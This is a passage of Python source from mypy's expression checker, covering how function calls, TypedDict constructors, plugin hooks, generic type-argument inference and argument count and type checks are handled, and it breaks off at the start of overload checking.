if e.callee.fullname in ('builtins.isinstance', 'builtins.issubclass'):
self.check_runtime_protocol_test(e)
if e.callee.fullname == 'builtins.issubclass':
self.check_protocol_issubclass(e)
if isinstance(ret_type, UninhabitedType) and not ret_type.ambiguous:
self.chk.binder.unreachable()
# Warn on calls to functions that always return None. The check
# of ret_type is both a common-case optimization and prevents reporting
# the error in dynamic functions (where it will be Any).
if (not allow_none_return and isinstance(ret_type, NoneTyp)
and self.always_returns_none(e.callee)):
self.chk.msg.does_not_return_value(callee_type, e)
return AnyType(TypeOfAny.from_error)
return ret_type
def method_fullname(self, object_type: Type, method_name: str) -> Optional[str]:
"""Convert a method name to a fully qualified name, based on the type of the object that
it is invoked on. Return `None` if the name of `object_type` cannot be determined.
"""
if isinstance(object_type, CallableType) and object_type.is_type_obj():
# For class method calls, object_type is a callable representing the class object.
# We "unwrap" it to a regular type, as the class/instance method difference doesn't
# affect the fully qualified name.
object_type = object_type.ret_type
type_name = None
if isinstance(object_type, Instance):
type_name = object_type.type.fullname()
elif isinstance(object_type, TypedDictType):
info = object_type.fallback.type.get_containing_type_info(method_name)
type_name = info.fullname() if info is not None else None
elif isinstance(object_type, TupleType):
type_name = object_type.fallback.type.fullname()
if type_name is not None:
return '{}.{}'.format(type_name, method_name)
else:
return None
def always_returns_none(self, node: Expression) -> bool:
"""Check if `node` refers to something explicitly annotated as only returning None."""
if isinstance(node, RefExpr):
if self.defn_returns_none(node.node):
return True
if isinstance(node, MemberExpr) and node.node is None: # instance or class attribute
typ = self.chk.type_map.get(node.expr)
if isinstance(typ, Instance):
info = typ.type
elif (isinstance(typ, CallableType) and typ.is_type_obj() and
isinstance(typ.ret_type, Instance)):
info = typ.ret_type.type
else:
return False
sym = info.get(node.name)
if sym and self.defn_returns_none(sym.node):
return True
return False
def defn_returns_none(self, defn: Optional[SymbolNode]) -> bool:
"""Check if `defn` can _only_ return None."""
if isinstance(defn, FuncDef):
return (isinstance(defn.type, CallableType) and
isinstance(defn.type.ret_type, NoneTyp))
if isinstance(defn, OverloadedFuncDef):
return all(isinstance(item.type, CallableType) and
isinstance(item.type.ret_type, NoneTyp) for item in defn.items)
if isinstance(defn, Var):
if (not defn.is_inferred and isinstance(defn.type, CallableType) and
isinstance(defn.type.ret_type, NoneTyp)):
return True
if isinstance(defn.type, Instance):
sym = defn.type.type.get('__call__')
if sym and self.defn_returns_none(sym.node):
return True
return False
def check_runtime_protocol_test(self, e: CallExpr) -> None:
for expr in mypy.checker.flatten(e.args[1]):
tp = self.chk.type_map[expr]
if (isinstance(tp, CallableType) and tp.is_type_obj() and
tp.type_object().is_protocol and
not tp.type_object().runtime_protocol):
self.chk.fail('Only @runtime protocols can be used with'
' instance and class checks', e)
def check_protocol_issubclass(self, e: CallExpr) -> None:
for expr in mypy.checker.flatten(e.args[1]):
tp = self.chk.type_map[expr]
if (isinstance(tp, CallableType) and tp.is_type_obj() and
tp.type_object().is_protocol):
attr_members = non_method_protocol_members(tp.type_object())
if attr_members:
self.chk.msg.report_non_method_protocol(tp.type_object(),
attr_members, e)
def check_typeddict_call(self, callee: TypedDictType,
arg_kinds: List[int],
arg_names: Sequence[Optional[str]],
args: List[Expression],
context: Context) -> Type:
if len(args) >= 1 and all([ak == ARG_NAMED for ak in arg_kinds]):
# ex: Point(x=42, y=1337)
assert all(arg_name is not None for arg_name in arg_names)
item_names = cast(List[str], arg_names)
item_args = args
return self.check_typeddict_call_with_kwargs(
callee, OrderedDict(zip(item_names, item_args)), context)
if len(args) == 1 and arg_kinds[0] == ARG_POS:
unique_arg = args[0]
if isinstance(unique_arg, DictExpr):
# ex: Point({'x': 42, 'y': 1337})
return self.check_typeddict_call_with_dict(callee, unique_arg, context)
if isinstance(unique_arg, CallExpr) and isinstance(unique_arg.analyzed, DictExpr):
# ex: Point(dict(x=42, y=1337))
return self.check_typeddict_call_with_dict(callee, unique_arg.analyzed, context)
if len(args) == 0:
# ex: EmptyDict()
return self.check_typeddict_call_with_kwargs(
callee, OrderedDict(), context)
self.chk.fail(messages.INVALID_TYPEDDICT_ARGS, context)
return AnyType(TypeOfAny.from_error)
def check_typeddict_call_with_dict(self, callee: TypedDictType,
kwargs: DictExpr,
context: Context) -> Type:
item_args = [item[1] for item in kwargs.items]
item_names = [] # List[str]
for item_name_expr, item_arg in kwargs.items:
if not isinstance(item_name_expr, StrExpr):
key_context = item_name_expr or item_arg
self.chk.fail(messages.TYPEDDICT_KEY_MUST_BE_STRING_LITERAL, key_context)
return AnyType(TypeOfAny.from_error)
item_names.append(item_name_expr.value)
return self.check_typeddict_call_with_kwargs(
callee, OrderedDict(zip(item_names, item_args)), context)
def check_typeddict_call_with_kwargs(self, callee: TypedDictType,
kwargs: 'OrderedDict[str, Expression]',
context: Context) -> Type:
if not (callee.required_keys <= set(kwargs.keys()) <= set(callee.items.keys())):
expected_keys = [key for key in callee.items.keys()
if key in callee.required_keys or key in kwargs.keys()]
actual_keys = kwargs.keys()
self.msg.unexpected_typeddict_keys(
callee,
expected_keys=expected_keys,
actual_keys=list(actual_keys),
context=context)
return AnyType(TypeOfAny.from_error)
for (item_name, item_expected_type) in callee.items.items():
if item_name in kwargs:
item_value = kwargs[item_name]
self.chk.check_simple_assignment(
lvalue_type=item_expected_type, rvalue=item_value, context=item_value,
msg=messages.INCOMPATIBLE_TYPES,
lvalue_name='TypedDict item "{}"'.format(item_name),
rvalue_name='expression')
return callee
# Types and methods that can be used to infer partial types.
item_args = {'builtins.list': ['append'],
'builtins.set': ['add', 'discard'],
} # type: ClassVar[Dict[str, List[str]]]
container_args = {'builtins.list': {'extend': ['builtins.list']},
'builtins.dict': {'update': ['builtins.dict']},
'builtins.set': {'update': ['builtins.set', 'builtins.list']},
} # type: ClassVar[Dict[str, Dict[str, List[str]]]]
def try_infer_partial_type(self, e: CallExpr) -> None:
if isinstance(e.callee, MemberExpr) and isinstance(e.callee.expr, RefExpr):
var = e.callee.expr.node
if not isinstance(var, Var):
return
partial_types = self.chk.find_partial_types(var)
if partial_types is not None and not self.chk.current_node_deferred:
partial_type = var.type
if (partial_type is None or
not isinstance(partial_type, PartialType) or
partial_type.type is None):
# A partial None type -> can't infer anything.
return
typename = partial_type.type.fullname()
methodname = e.callee.name
# Sometimes we can infer a full type for a partial List, Dict or Set type.
# TODO: Don't infer argument expression twice.
if (typename in self.item_args and methodname in self.item_args[typename]
and e.arg_kinds == [ARG_POS]):
item_type = self.accept(e.args[0])
full_item_type = UnionType.make_simplified_union(
[item_type, partial_type.inner_types[0]])
if mypy.checker.is_valid_inferred_type(full_item_type):
var.type = self.chk.named_generic_type(typename, [full_item_type])
del partial_types[var]
elif (typename in self.container_args
and methodname in self.container_args[typename]
and e.arg_kinds == [ARG_POS]):
arg_type = self.accept(e.args[0])
if isinstance(arg_type, Instance):
arg_typename = arg_type.type.fullname()
if arg_typename in self.container_args[typename][methodname]:
full_item_types = [
UnionType.make_simplified_union([item_type, prev_type])
for item_type, prev_type
in zip(arg_type.args, partial_type.inner_types)
]
if all(mypy.checker.is_valid_inferred_type(item_type)
for item_type in full_item_types):
var.type = self.chk.named_generic_type(typename,
list(full_item_types))
del partial_types[var]
def apply_function_plugin(self,
arg_types: List[Type],
inferred_ret_type: Type,
arg_kinds: List[int],
formal_to_actual: List[List[int]],
args: List[Expression],
num_formals: int,
fullname: str,
object_type: Optional[Type],
context: Context) -> Type:
"""Use special case logic to infer the return type of a specific named function/method.
Caller must ensure that a plugin hook exists. There are two different cases:
- If object_type is None, the caller must ensure that a function hook exists
for fullname.
- If object_type is not None, the caller must ensure that a method hook exists
for fullname.
Return the inferred return type.
"""
formal_arg_types = [[] for _ in range(num_formals)] # type: List[List[Type]]
formal_arg_exprs = [[] for _ in range(num_formals)] # type: List[List[Expression]]
for formal, actuals in enumerate(formal_to_actual):
for actual in actuals:
formal_arg_types[formal].append(arg_types[actual])
formal_arg_exprs[formal].append(args[actual])
if object_type is None:
# Apply function plugin
callback = self.plugin.get_function_hook(fullname)
assert callback is not None # Assume that caller ensures this
return callback(
FunctionContext(formal_arg_types, inferred_ret_type, formal_arg_exprs,
context, self.chk))
else:
# Apply method plugin
method_callback = self.plugin.get_method_hook(fullname)
assert method_callback is not None # Assume that caller ensures this
return method_callback(
MethodContext(object_type, formal_arg_types,
inferred_ret_type, formal_arg_exprs,
context, self.chk))
def apply_method_signature_hook(
self, callee: FunctionLike, args: List[Expression],
arg_kinds: List[int], context: Context,
arg_names: Optional[Sequence[Optional[str]]], object_type: Type,
signature_hook: Callable[[MethodSigContext], CallableType]) -> FunctionLike:
"""Apply a plugin hook that may infer a more precise signature for a method."""
if isinstance(callee, CallableType):
num_formals = len(callee.arg_kinds)
formal_to_actual = map_actuals_to_formals(
arg_kinds, arg_names,
callee.arg_kinds, callee.arg_names,
lambda i: self.accept(args[i]))
formal_arg_exprs = [[] for _ in range(num_formals)] # type: List[List[Expression]]
for formal, actuals in enumerate(formal_to_actual):
for actual in actuals:
formal_arg_exprs[formal].append(args[actual])
return signature_hook(
MethodSigContext(object_type, formal_arg_exprs, callee, context, self.chk))
else:
assert isinstance(callee, Overloaded)
items = []
for item in callee.items():
adjusted = self.apply_method_signature_hook(
item, args, arg_kinds, context, arg_names, object_type, signature_hook)
assert isinstance(adjusted, CallableType)
items.append(adjusted)
return Overloaded(items)
def transform_callee_type(
self, callable_name: Optional[str], callee: Type, args: List[Expression],
arg_kinds: List[int], context: Context,
arg_names: Optional[Sequence[Optional[str]]] = None,
object_type: Optional[Type] = None) -> Type:
"""Attempt to determine a more accurate signature for a method call.
This is done by looking up and applying a method signature hook (if one exists for the
given method name).
If no matching method signature hook is found, callee is returned unmodified. The same
happens if the arguments refer to a non-method callable (this is allowed so that the code
calling transform_callee_type needs to perform fewer boilerplate checks).
Note: this method is *not* called automatically as part of check_call, because in some
cases check_call is called multiple times while checking a single call (for example when
dealing with overloads). Instead, this method needs to be called explicitly
(if appropriate) before the signature is passed to check_call.
"""
if (callable_name is not None
and object_type is not None
and isinstance(callee, FunctionLike)):
signature_hook = self.plugin.get_method_signature_hook(callable_name)
if signature_hook:
return self.apply_method_signature_hook(
callee, args, arg_kinds, context, arg_names, object_type, signature_hook)
return callee
def check_call_expr_with_callee_type(self,
callee_type: Type,
e: CallExpr,
callable_name: Optional[str],
object_type: Optional[Type]) -> Type:
"""Type check call expression.
The given callee type overrides the type of the callee
expression.
"""
# Try to refine the call signature using plugin hooks before checking the call.
callee_type = self.transform_callee_type(
callable_name, callee_type, e.args, e.arg_kinds, e, e.arg_names, object_type)
return self.check_call(callee_type, e.args, e.arg_kinds, e,
e.arg_names, callable_node=e.callee,
callable_name=callable_name,
object_type=object_type)[0]
def check_call(self, callee: Type, args: List[Expression],
arg_kinds: List[int], context: Context,
arg_names: Optional[Sequence[Optional[str]]] = None,
callable_node: Optional[Expression] = None,
arg_messages: Optional[MessageBuilder] = None,
callable_name: Optional[str] = None,
object_type: Optional[Type] = None) -> Tuple[Type, Type]:
"""Type check a call.
Also infer type arguments if the callee is a generic function.
Return (result type, inferred callee type).
Arguments:
callee: type of the called value
args: actual argument expressions
arg_kinds: contains nodes.ARG_* constant for each argument in args
describing whether the argument is positional, *arg, etc.
arg_names: names of arguments (optional)
callable_node: associate the inferred callable type to this node,
if specified
arg_messages: TODO
callable_name: Fully-qualified name of the function/method to call,
or None if unavailable (examples: 'builtins.open', 'typing.Mapping.get')
object_type: If callable_name refers to a method, the type of the object
on which the method is being called
"""
arg_messages = arg_messages or self.msg
if isinstance(callee, CallableType):
if callable_name is None and callee.name:
callable_name = callee.name
if callee.is_type_obj() and isinstance(callee.ret_type, Instance):
callable_name = callee.ret_type.type.fullname()
if (isinstance(callable_node, RefExpr)
and callable_node.fullname in ('enum.Enum', 'enum.IntEnum',
'enum.Flag', 'enum.IntFlag')):
# An Enum() call that failed SemanticAnalyzerPass2.check_enum_call().
return callee.ret_type, callee
if (callee.is_type_obj() and callee.type_object().is_abstract
# Exception for Type[...]
and not callee.from_type_type
and not callee.type_object().fallback_to_any):
type = callee.type_object()
self.msg.cannot_instantiate_abstract_class(
callee.type_object().name(), type.abstract_attributes,
context)
elif (callee.is_type_obj() and callee.type_object().is_protocol
# Exception for Type[...]
and not callee.from_type_type):
self.chk.fail('Cannot instantiate protocol class "{}"'
.format(callee.type_object().name()), context)
formal_to_actual = map_actuals_to_formals(
arg_kinds, arg_names,
callee.arg_kinds, callee.arg_names,
lambda i: self.accept(args[i]))
if callee.is_generic():
callee = freshen_function_type_vars(callee)
callee = self.infer_function_type_arguments_using_context(
callee, context)
callee = self.infer_function_type_arguments(
callee, args, arg_kinds, formal_to_actual, context)
arg_types = self.infer_arg_types_in_context(
callee, args, arg_kinds, formal_to_actual)
self.check_argument_count(callee, arg_types, arg_kinds,
arg_names, formal_to_actual, context, self.msg)
self.check_argument_types(arg_types, arg_kinds, callee, formal_to_actual, context,
messages=arg_messages)
if (callee.is_type_obj() and (len(arg_types) == 1)
and is_equivalent(callee.ret_type, self.named_type('builtins.type'))):
callee = callee.copy_modified(ret_type=TypeType.make_normalized(arg_types[0]))
if callable_node:
# Store the inferred callable type.
self.chk.store_type(callable_node, callee)
if (callable_name
and ((object_type is None and self.plugin.get_function_hook(callable_name))
or (object_type is not None
and self.plugin.get_method_hook(callable_name)))):
ret_type = self.apply_function_plugin(
arg_types, callee.ret_type, arg_kinds, formal_to_actual,
args, len(callee.arg_types), callable_name, object_type, context)
callee = callee.copy_modified(ret_type=ret_type)
return callee.ret_type, callee
elif isinstance(callee, Overloaded):
arg_types = self.infer_arg_types_in_empty_context(args)
return self.check_overload_call(callee=callee,
args=args,
arg_types=arg_types,
arg_kinds=arg_kinds,
arg_names=arg_names,
callable_name=callable_name,
object_type=object_type,
context=context,
arg_messages=arg_messages)
elif isinstance(callee, AnyType) or not self.chk.in_checked_function():
self.infer_arg_types_in_empty_context(args)
if isinstance(callee, AnyType):
return (AnyType(TypeOfAny.from_another_any, source_any=callee),
AnyType(TypeOfAny.from_another_any, source_any=callee))
else:
return AnyType(TypeOfAny.special_form), AnyType(TypeOfAny.special_form)
elif isinstance(callee, UnionType):
self.msg.disable_type_names += 1
results = [self.check_call(subtype, args, arg_kinds, context, arg_names,
arg_messages=arg_messages)
for subtype in callee.relevant_items()]
self.msg.disable_type_names -= 1
return (UnionType.make_simplified_union([res[0] for res in results]),
callee)
elif isinstance(callee, Instance):
call_function = analyze_member_access('__call__', callee, context,
False, False, False, self.named_type,
self.not_ready_callback, self.msg,
original_type=callee, chk=self.chk)
return self.check_call(call_function, args, arg_kinds, context, arg_names,
callable_node, arg_messages)
elif isinstance(callee, TypeVarType):
return self.check_call(callee.upper_bound, args, arg_kinds, context, arg_names,
callable_node, arg_messages)
elif isinstance(callee, TypeType):
# Pass the original Type[] as context since that's where errors should go.
item = self.analyze_type_type_callee(callee.item, callee)
return self.check_call(item, args, arg_kinds, context, arg_names,
callable_node, arg_messages)
elif isinstance(callee, TupleType):
return self.check_call(callee.fallback, args, arg_kinds, context,
arg_names, callable_node, arg_messages, callable_name,
object_type)
else:
return self.msg.not_callable(callee, context), AnyType(TypeOfAny.from_error)
def analyze_type_type_callee(self, item: Type, context: Context) -> Type:
"""Analyze the callee X in X(...) where X is Type[item].
Return a Y that we can pass to check_call(Y, ...).
"""
if isinstance(item, AnyType):
return AnyType(TypeOfAny.from_another_any, source_any=item)
if isinstance(item, Instance):
res = type_object_type(item.type, self.named_type)
if isinstance(res, CallableType):
res = res.copy_modified(from_type_type=True)
return expand_type_by_instance(res, item)
if isinstance(item, UnionType):
return UnionType([self.analyze_type_type_callee(tp, context)
for tp in item.relevant_items()], item.line)
if isinstance(item, TypeVarType):
# Pretend we're calling the typevar's upper bound,
# i.e. its constructor (a poor approximation for reality,
# but better than AnyType...), but replace the return type
# with typevar.
callee = self.analyze_type_type_callee(item.upper_bound,
context) # type: Optional[Type]
if isinstance(callee, CallableType):
callee = callee.copy_modified(ret_type=item)
elif isinstance(callee, Overloaded):
callee = Overloaded([c.copy_modified(ret_type=item)
for c in callee.items()])
if callee:
return callee
# We support Type of namedtuples but not of tuples in general
if isinstance(item, TupleType) and item.fallback.type.fullname() != 'builtins.tuple':
return self.analyze_type_type_callee(item.fallback, context)
self.msg.unsupported_type_type(item, context)
return AnyType(TypeOfAny.from_error)
def infer_arg_types_in_empty_context(self, args: List[Expression]) -> List[Type]:
"""Infer argument expression types in an empty context.
In short, we basically recurse on each argument without considering
in what context the argument was called.
"""
res = [] # type: List[Type]
for arg in args:
arg_type = self.accept(arg)
if has_erased_component(arg_type):
res.append(NoneTyp())
else:
res.append(arg_type)
return res
def infer_arg_types_in_context(
self, callee: CallableType, args: List[Expression], arg_kinds: List[int],
formal_to_actual: List[List[int]]) -> List[Type]:
"""Infer argument expression types using a callable type as context.
For example, if callee argument 2 has type List[int], infer the
argument expression with List[int] type context.
Returns the inferred types of *actual arguments*.
"""
res = [None] * len(args) # type: List[Optional[Type]]
for i, actuals in enumerate(formal_to_actual):
for ai in actuals:
if arg_kinds[ai] not in (nodes.ARG_STAR, nodes.ARG_STAR2):
res[ai] = self.accept(args[ai], callee.arg_types[i])
# Fill in the rest of the argument types.
for i, t in enumerate(res):
if not t:
res[i] = self.accept(args[i])
assert all(tp is not None for tp in res)
return cast(List[Type], res)
def infer_function_type_arguments_using_context(
self, callable: CallableType, error_context: Context) -> CallableType:
"""Unify callable return type to type context to infer type vars.
For example, if the return type is set[t] where 't' is a type variable
of callable, and if the context is set[int], return callable modified
by substituting 't' with 'int'.
"""
ctx = self.type_context[-1]
if not ctx:
return callable
# The return type may have references to type metavariables that
# we are inferring right now. We must consider them as indeterminate
# and they are not potential results; thus we replace them with the
# special ErasedType type. On the other hand, class type variables are
# valid results.
erased_ctx = replace_meta_vars(ctx, ErasedType())
ret_type = callable.ret_type
if is_optional(ret_type) and is_optional(ctx):
# If both the context and the return type are optional, unwrap the optional,
# since in 99% cases this is what a user expects. In other words, we replace
# Optional[T] <: Optional[int]
# with
# T <: int
# while the former would infer T <: Optional[int].
ret_type = remove_optional(ret_type)
erased_ctx = remove_optional(erased_ctx)
#
# TODO: Instead of this hack and the one below, we need to use outer and
# inner contexts at the same time. This is however not easy because of two
# reasons:
# * We need to support constraints like [1 <: 2, 2 <: X], i.e. with variables
# on both sides. (This is not too hard.)
# * We need to update all the inference "infrastructure", so that all
# variables in an expression are inferred at the same time.
# (And this is hard, also we need to be careful with lambdas that require
# two passes.)
if isinstance(ret_type, TypeVarType) and not is_invariant_instance(ctx):
# Another special case: the return type is a type variable. If it's unrestricted,
# we could infer a too general type for the type variable if we use context,
# and this could result in confusing and spurious type errors elsewhere.
#
# Give up and just use function arguments for type inference. As an exception,
# if the context is an invariant instance type, actually use it as context, as
# this *seems* to usually be the reasonable thing to do.
#
# See also github issues #462 and #360.
return callable.copy_modified()
args = infer_type_arguments(callable.type_var_ids(), ret_type, erased_ctx)
# Only substitute non-Uninhabited and non-erased types.
new_args = [] # type: List[Optional[Type]]
for arg in args:
if has_uninhabited_component(arg) or has_erased_component(arg):
new_args.append(None)
else:
new_args.append(arg)
# Don't show errors after we have only used the outer context for inference.
# We will use argument context to infer more variables.
return self.apply_generic_arguments(callable, new_args, error_context,
skip_unsatisfied=True)
def infer_function_type_arguments(self, callee_type: CallableType,
args: List[Expression],
arg_kinds: List[int],
formal_to_actual: List[List[int]],
context: Context) -> CallableType:
"""Infer the type arguments for a generic callee type.
Infer based on the types of arguments.
Return a derived callable type that has the arguments applied.
"""
if self.chk.in_checked_function():
# Disable type errors during type inference. There may be errors
# due to partial available context information at this time, but
# these errors can be safely ignored as the arguments will be
# inferred again later.
self.msg.disable_errors()
arg_types = self.infer_arg_types_in_context(
callee_type, args, arg_kinds, formal_to_actual)
self.msg.enable_errors()
arg_pass_nums = self.get_arg_infer_passes(
callee_type.arg_types, formal_to_actual, len(args))
pass1_args = [] # type: List[Optional[Type]]
for i, arg in enumerate(arg_types):
if arg_pass_nums[i] > 1:
pass1_args.append(None)
else:
pass1_args.append(arg)
inferred_args = infer_function_type_arguments(
callee_type, pass1_args, arg_kinds, formal_to_actual,
strict=self.chk.in_checked_function())
if 2 in arg_pass_nums:
# Second pass of type inference.
(callee_type,
inferred_args) = self.infer_function_type_arguments_pass2(
callee_type, args, arg_kinds, formal_to_actual,
inferred_args, context)
if callee_type.special_sig == 'dict' and len(inferred_args) == 2 and (
ARG_NAMED in arg_kinds or ARG_STAR2 in arg_kinds):
# HACK: Infer str key type for dict(...) with keyword args. The type system
# can't represent this so we special case it, as this is a pretty common
# thing. This doesn't quite work with all possible subclasses of dict
# if they shuffle type variables around, as we assume that there is a 1-1
# correspondence with dict type variables. This is a marginal issue and
# a little tricky to fix so it's left unfixed for now.
first_arg = inferred_args[0]
if isinstance(first_arg, (NoneTyp, UninhabitedType)):
inferred_args[0] = self.named_type('builtins.str')
elif not first_arg or not is_subtype(self.named_type('builtins.str'), first_arg):
self.msg.fail(messages.KEYWORD_ARGUMENT_REQUIRES_STR_KEY_TYPE,
context)
else:
# In dynamically typed functions use implicit 'Any' types for
# type variables.
inferred_args = [AnyType(TypeOfAny.unannotated)] * len(callee_type.variables)
return self.apply_inferred_arguments(callee_type, inferred_args,
context)
def infer_function_type_arguments_pass2(
self, callee_type: CallableType,
args: List[Expression],
arg_kinds: List[int],
formal_to_actual: List[List[int]],
old_inferred_args: Sequence[Optional[Type]],
context: Context) -> Tuple[CallableType, List[Optional[Type]]]:
"""Perform second pass of generic function type argument inference.
The second pass is needed for arguments with types such as Callable[[T], S],
where both T and S are type variables, when the actual argument is a
lambda with inferred types. The idea is to infer the type variable T
in the first pass (based on the types of other arguments). This lets
us infer the argument and return type of the lambda expression and
thus also the type variable S in this second pass.
Return (the callee with type vars applied, inferred actual arg types).
"""
# None or erased types in inferred types mean that there was not enough
# information to infer the argument. Replace them with None values so
# that they are not applied yet below.
inferred_args = list(old_inferred_args)
for i, arg in enumerate(inferred_args):
if isinstance(arg, (NoneTyp, UninhabitedType)) or has_erased_component(arg):
inferred_args[i] = None
callee_type = self.apply_generic_arguments(callee_type, inferred_args, context)
arg_types = self.infer_arg_types_in_context(
callee_type, args, arg_kinds, formal_to_actual)
inferred_args = infer_function_type_arguments(
callee_type, arg_types, arg_kinds, formal_to_actual)
return callee_type, inferred_args
def get_arg_infer_passes(self, arg_types: List[Type],
formal_to_actual: List[List[int]],
num_actuals: int) -> List[int]:
"""Return pass numbers for args for two-pass argument type inference.
For each actual, the pass number is either 1 (first pass) or 2 (second
pass).
Two-pass argument type inference primarily lets us infer types of
lambdas more effectively.
"""
res = [1] * num_actuals
for i, arg in enumerate(arg_types):
if arg.accept(ArgInferSecondPassQuery()):
for j in formal_to_actual[i]:
res[j] = 2
return res
def apply_inferred_arguments(self, callee_type: CallableType,
inferred_args: Sequence[Optional[Type]],
context: Context) -> CallableType:
"""Apply inferred values of type arguments to a generic function.
Inferred_args contains the values of function type arguments.
"""
# Report error if some of the variables could not be solved. In that
# case assume that all variables have type Any to avoid extra
# bogus error messages.
for i, inferred_type in enumerate(inferred_args):
if not inferred_type or has_erased_component(inferred_type):
# Could not infer a non-trivial type for a type variable.
self.msg.could_not_infer_type_arguments(
callee_type, i + 1, context)
inferred_args = [AnyType(TypeOfAny.from_error)] * len(inferred_args)
# Apply the inferred types to the function type. In this case the
# return type must be CallableType, since we give the right number of type
# arguments.
return self.apply_generic_arguments(callee_type, inferred_args, context)
def check_argument_count(self,
callee: CallableType,
actual_types: List[Type],
actual_kinds: List[int],
actual_names: Optional[Sequence[Optional[str]]],
formal_to_actual: List[List[int]],
context: Optional[Context],
messages: Optional[MessageBuilder]) -> bool:
"""Check that there is a value for all required arguments to a function.
Also check that there are no duplicate values for arguments. Report found errors
using 'messages' if it's not None. If 'messages' is given, 'context' must also be given.
Return False if there were any errors. Otherwise return True
"""
if messages:
assert context, "Internal error: messages given without context"
elif context is None:
context = TempNode(AnyType(TypeOfAny.special_form)) # Avoid "is None" checks
# TODO(jukka): We could return as soon as we find an error if messages is None.
# Collect list of all actual arguments matched to formal arguments.
all_actuals = [] # type: List[int]
for actuals in formal_to_actual:
all_actuals.extend(actuals)
ok, is_unexpected_arg_error = self.check_for_extra_actual_arguments(
callee, actual_types, actual_kinds, actual_names, all_actuals, context, messages)
# Check for too many or few values for formals.
for i, kind in enumerate(callee.arg_kinds):
if kind == nodes.ARG_POS and (not formal_to_actual[i] and
not is_unexpected_arg_error):
# No actual for a mandatory positional formal.
if messages:
messages.too_few_arguments(callee, context, actual_names)
ok = False
elif kind == nodes.ARG_NAMED and (not formal_to_actual[i] and
not is_unexpected_arg_error):
# No actual for a mandatory named formal
if messages:
argname = callee.arg_names[i]
assert argname is not None
messages.missing_named_argument(callee, context, argname)
ok = False
elif kind in [nodes.ARG_POS, nodes.ARG_OPT,
nodes.ARG_NAMED, nodes.ARG_NAMED_OPT] and is_duplicate_mapping(
formal_to_actual[i], actual_kinds):
if (self.chk.in_checked_function() or
isinstance(actual_types[formal_to_actual[i][0]], TupleType)):
if messages:
messages.duplicate_argument_value(callee, i, context)
ok = False
elif (kind in (nodes.ARG_NAMED, nodes.ARG_NAMED_OPT) and formal_to_actual[i] and
actual_kinds[formal_to_actual[i][0]] not in [nodes.ARG_NAMED, nodes.ARG_STAR2]):
# Positional argument when expecting a keyword argument.
if messages:
messages.too_many_positional_arguments(callee, context)
ok = False
return ok
def check_for_extra_actual_arguments(self,
callee: CallableType,
actual_types: List[Type],
actual_kinds: List[int],
actual_names: Optional[Sequence[Optional[str]]],
all_actuals: List[int],
context: Context,
messages: Optional[MessageBuilder]) -> Tuple[bool, bool]:
"""Check for extra actual arguments.
Return tuple (was everything ok,
was there an extra keyword argument error [used to avoid duplicate errors]).
"""
is_unexpected_arg_error = False # Keep track of errors to avoid duplicate errors
ok = True # False if we've found any error
for i, kind in enumerate(actual_kinds):
if i not in all_actuals and (
kind != nodes.ARG_STAR or
not is_empty_tuple(actual_types[i])):
# Extra actual: not matched by a formal argument.
ok = False
if kind != nodes.ARG_NAMED:
if messages:
messages.too_many_arguments(callee, context)
else:
if messages:
assert actual_names, "Internal error: named kinds without names given"
act_name = actual_names[i]
assert act_name is not None
messages.unexpected_keyword_argument(callee, act_name, context)
is_unexpected_arg_error = True
elif ((kind == nodes.ARG_STAR and nodes.ARG_STAR not in callee.arg_kinds)
or kind == nodes.ARG_STAR2):
actual_type = actual_types[i]
if isinstance(actual_type, (TupleType, TypedDictType)):
if all_actuals.count(i) < len(actual_type.items):
# Too many tuple/dict items as some did not match.
if messages:
if (kind != nodes.ARG_STAR2
or not isinstance(actual_type, TypedDictType)):
messages.too_many_arguments(callee, context)
else:
messages.too_many_arguments_from_typed_dict(callee, actual_type,
context)
is_unexpected_arg_error = True
ok = False
# *args/**kwargs can be applied even if the function takes a fixed
# number of positional arguments. This may succeed at runtime.
return ok, is_unexpected_arg_error
def check_argument_types(self,
arg_types: List[Type],
arg_kinds: List[int],
callee: CallableType,
formal_to_actual: List[List[int]],
context: Context,
messages: Optional[MessageBuilder] = None,
check_arg: Optional[ArgChecker] = None) -> None:
"""Check argument types against a callable type.
Report errors if the argument types are not compatible.
"""
messages = messages or self.msg
check_arg = check_arg or self.check_arg
# Keep track of consumed tuple *arg items.
mapper = ArgTypeExpander()
for i, actuals in enumerate(formal_to_actual):
for actual in actuals:
actual_type = arg_types[actual]
if actual_type is None:
continue # Some kind of error was already reported.
actual_kind = arg_kinds[actual]
# Check that a *arg is valid as varargs.
if (actual_kind == nodes.ARG_STAR and
not self.is_valid_var_arg(actual_type)):
messages.invalid_var_arg(actual_type, context)
if (actual_kind == nodes.ARG_STAR2 and
not self.is_valid_keyword_var_arg(actual_type)):
is_mapping = is_subtype(actual_type, self.chk.named_type('typing.Mapping'))
messages.invalid_keyword_var_arg(actual_type, is_mapping, context)
expanded_actual = mapper.expand_actual_type(
actual_type, actual_kind,
callee.arg_names[i], callee.arg_kinds[i])
check_arg(expanded_actual, actual_type, arg_kinds[actual],
callee.arg_types[i],
actual + 1, i + 1, callee, context, messages)
def check_arg(self, caller_type: Type, original_caller_type: Type,
caller_kind: int,
callee_type: Type, n: int, m: int, callee: CallableType,
context: Context, messages: MessageBuilder) -> None:
"""Check the type of a single argument in a call."""
if isinstance(caller_type, DeletedType):
messages.deleted_as_rvalue(caller_type, context)
# Only non-abstract non-protocol class can be given where Type[...] is expected...
elif (isinstance(caller_type, CallableType) and isinstance(callee_type, TypeType) and
caller_type.is_type_obj() and
(caller_type.type_object().is_abstract or caller_type.type_object().is_protocol) and
isinstance(callee_type.item, Instance) and
(callee_type.item.type.is_abstract or callee_type.item.type.is_protocol)):
self.msg.concrete_only_call(callee_type, context)
elif not is_subtype(caller_type, callee_type):
if self.chk.should_suppress_optional_error([caller_type, callee_type]):
return
messages.incompatible_argument(n, m, callee, original_caller_type,
caller_kind, context)
if (isinstance(original_caller_type, (Instance, TupleType, TypedDictType)) and
isinstance(callee_type, Instance) and callee_type.type.is_protocol):
self.msg.report_protocol_problems(original_caller_type, callee_type, context)
if (isinstance(callee_type, CallableType) and
isinstance(original_caller_type, Instance)):
call = find_member('__call__', original_caller_type, original_caller_type)
if call:
self.msg.note_call(original_caller_type, call, context)
def check_overload_call(self,
callee: Overloaded,
args: List[Expression],
arg_types: List[Type],
arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]],
callable_name: Optional[str],
object_type: Optional[Type],
context: Context,
arg_messages: MessageBuilder) -> Tuple[Type, Type]:
"""Checks a call to an overloaded function."""
# Step 1: Filter call targets to remove ones where the argument counts don't match
plausible_targets = self.plausible_overload_call_targets(arg_types, arg_kinds,
arg_names, callee)
